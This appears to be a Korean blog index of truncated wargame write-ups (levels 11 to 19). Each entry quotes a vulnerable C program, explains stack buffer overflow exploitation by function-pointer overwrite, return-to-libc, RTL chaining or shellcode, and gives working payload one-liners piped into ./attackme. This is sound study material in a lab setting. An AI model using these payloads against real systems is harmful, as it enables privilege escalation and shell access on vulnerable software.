junsoo STUDY

level19

main() { char buf[20]; gets(buf); printf("%s\n",buf); } 코드를 보면 setreuid() 함수가 없다.. 따라서 쉘 만 실행하면 level20의 권한을 얻을 수 없다. 따라서 setreuid() 함수 실행 후 system("/bin/sh") 함수를 실행 해야한다. RTL Chaining 공격 기법을 이용해 문제를 풀어보자! RTL 공격에서 RET 주소를 변조하여 하나의 공유 라이브러리 함수를 호출 했다면, RTL Chaining 공격 기법은 RTL 공격 기법을 응용하여 여러개의 공유 라이브러리 함수를 호출 할 수 있다. https://jeongzero.oopy.io/570682fc-ef3e-4d83-9e55-7d28b0ef02dc RTL 기법 파헤치기 Retur..

level17

#include void printit() { printf("Hello there!\n"); } main() { int crap; void (*call)()=printit; char buf[20]; fgets(buf,48,stdin); setreuid(3098,3098); call(); } level17 문제는 shell 실행시키는 함수가 없다. RTL 방법을 시도해보자 [그림 1-1] 참조하면 [그림 1-2] 그릴 수 있다. RTL 방식으로 payload 작성하면 "A" * 40 + system 함수 주소 + dummy[4] + /bin/sh 총 52 바이트로 48바이트를 초과해서 문제가 생긴다. 따라서 RTL 방식은 사용할 수 없다. bof 문제 중 버퍼의 크기가 넉넉하지 않은 경우 환경 변수를 이용..

level16

#include void shell() { setreuid(3097,3097); system("/bin/sh"); } void printit() { printf("Hello there!\n"); } main() { int crap; void (*call)()=printit; char buf[20]; fgets(buf,48,stdin); call(); } call 변수는 포인터 함수이다. printit 함수 주소 대신 shell 함수 주소로 덮어야한다. [그림 1-1]를 참조하면 [그림 1-2] 그릴 수 있다. payload 는 "A" * 40 + shell 함수 주소 이다. shell 주소는 [그림 1-3] 처럼 간단하게 구할 수 있다. (python -c 'print("A"*40+"\xd0\x84\x0..

level15

#include main() { int crap; int *check; char buf[20]; fgets(buf,45,stdin); if (*check==0xdeadbeef) { setreuid(3096,3096); system("/bin/sh"); } } level14 와 비슷하지만 check 변수가 포인터이다. 따라서 0xdeadbeef 문자열이 존재하는 주소를 check 변수에 넣어야한다. [그림 1-1] 참조하면 [그림 1-2] 그릴 수 있다. payload 는 "A" * 40 + 0xdeadbeef 문자열 주소 따라서 0xdeadbeef 문자열 위치를 찾아야한다. main 어셈블리를 보면 0x080484b0 위치에 0xdeadbeef 가 있다. 0x080484b2 위치에 문자열이 존재한다. (..

level14

#include #include main() { int crap; int check; char buf[20]; fgets(buf,45,stdin); if (check==0xdeadbeef) { setreuid(3095,3095); system("/bin/sh"); } } level14 문제는 fgets 함수를 사용하는 45 글자만 입력받는다. if문만 참이 되면 shell 실행된다. [그림 1-1] 참조하면 [그림 1-2] 그릴 수 있다. payload 는 "A" * 40 + 0xdeadbeef 이다. 딱 44글자 들어간다. (python -c 'print("A"*40+"\xef\xbe\xad\xde")';cat) | ./attackme

level13

#include main(int argc, char *argv[]) { long i=0x1234567; char buf[1024]; setreuid( 3094, 3094 ); if(argc > 1) strcpy(buf,argv[1]); if(i != 0x1234567) { printf(" Warnning: Buffer Overflow !!! \n"); kill(0,11); } } level13 문제는 bof 하면서 변수 i 값에 0x1234567 넣어야한다. [그림 1-1] 참조하면 [그림 1-2] 그릴 수 있다. 따라서 payload 는 "A" * 1036 + "0x1234567" + "AAAA" * 3 + system + "AAAA" + /bin/sh 이다. system 함수, /bin/sh 주소를 ..

level12

#include #include 코드를 보면 level11 과 비슷하다. level11 은 프로그램 실행시 인자값으로 받았다면 level12는 gets 로 실행 도중 입력을 받는다. 따라서 payload를 어떻게 입력하는지 알아가기 위한 문제인거 같다. level12 또한 시스템 함수를 넣어야한다. [그림 1-2] 참조하면 [그림 1-3]을 그릴 수 있다. RTL 기법으로 문제를 풀어보자 [그림 1-4] , [그림 1-5]를 참조하면 payload 는 "A" * 268 + 0x4203f2c0 + AAAA + 0x42127ea4 이다. (python -c 'print("A"*268+"\xc0\xf2\x03\x42"+"AAAA"+"\xa4\x7e\x12\x42")';cat) | ./attackme 성공

level11

setuid 함수는 있지만 /bin/sh 실행시키는 코드는 없다. 따라서 /bin/sh -> shellcode를 넣어야 겠다. [그림 1-2] 참조하면 [그림 1-3] 그릴 수 있다. 코드에서 strcpy 함수를 사용하므로 bof 할 떄 제한이 없다. 따라서 payload 는 256 + 8 + 4 + shellcode 위치 + shellcode 해보자 우선 shellcode 위치를 찾자 level11 문제는 프로그램 실행시 인자값(argv[1])이 필요하므로 인자값은 [그림 1-4] 처럼 하면된다. 0x43434343 위치가 shellcode 삽입되는 곳이다. 따라서 shellcode 위치는 0xbfffdab0 이다. shellcode는 구글링해서 가져오자 완성된 payload는 "A"*268 + 0xb..